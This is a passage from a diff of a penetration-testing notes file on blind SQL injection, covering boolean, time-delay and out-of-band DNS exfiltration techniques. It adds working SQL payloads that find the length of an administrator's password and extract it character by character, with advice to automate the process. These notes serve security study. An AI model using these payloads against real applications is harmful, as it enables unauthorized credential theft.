alipali737/pen-test-docs/Attacks/sql-injection/SQL Injection Cheatsheet.md

 - You can change the logic of the query to trigger a detectable difference in the application's response depending on the truth of a single condition.
 This might involve injecting a new condition into some Boolean logic, or conditionally triggering an error such as a divide-by-zero.
 - You can conditionally trigger a time delay in the processing of the query, allowing you to infer the truth of the condition based on the response time.
 - You can trigger an out-of-band network interaction, using [OAST](https://alipali737.github.io/pen-test-docs/Knowledge/Testing/Application%20Security%20Testing%20Methods.html#out-of-band-application-security-testing-oast) techniques.
 Often you can directly exfiltrate data via the out-of-band channel eg. placing the data into a DNS lookup for a domain you control.

+A nice way to determine the length of a field could be by iterating over a condition of its length:
+{% highlight sql %}
+' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>3)='a'
+{% endhighlight %}

+For cracking the value you can repeat a similar technique by testing each letter one by 1:
+{% highlight sql %}
+' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a'
+' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='b'
+' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='c'
+...
+' AND (SELECT SUBSTRING(password,15,1) FROM users WHERE username='administrator')='a'
+' AND (SELECT SUBSTRING(password,16,1) FROM users WHERE username='administrator')='a'
+{% endhighlight %}

+This can then be automated in a simple script to determine the length and then crack the password (could even create a thread for each character and speed it up) or use a system like Burp Intruder for more basic automation

 ## Second-order SQL Injection
 First-order SQL injection is where an application takes user input from an HTTP request and incorporates the input into an SQL query in an unsafe way.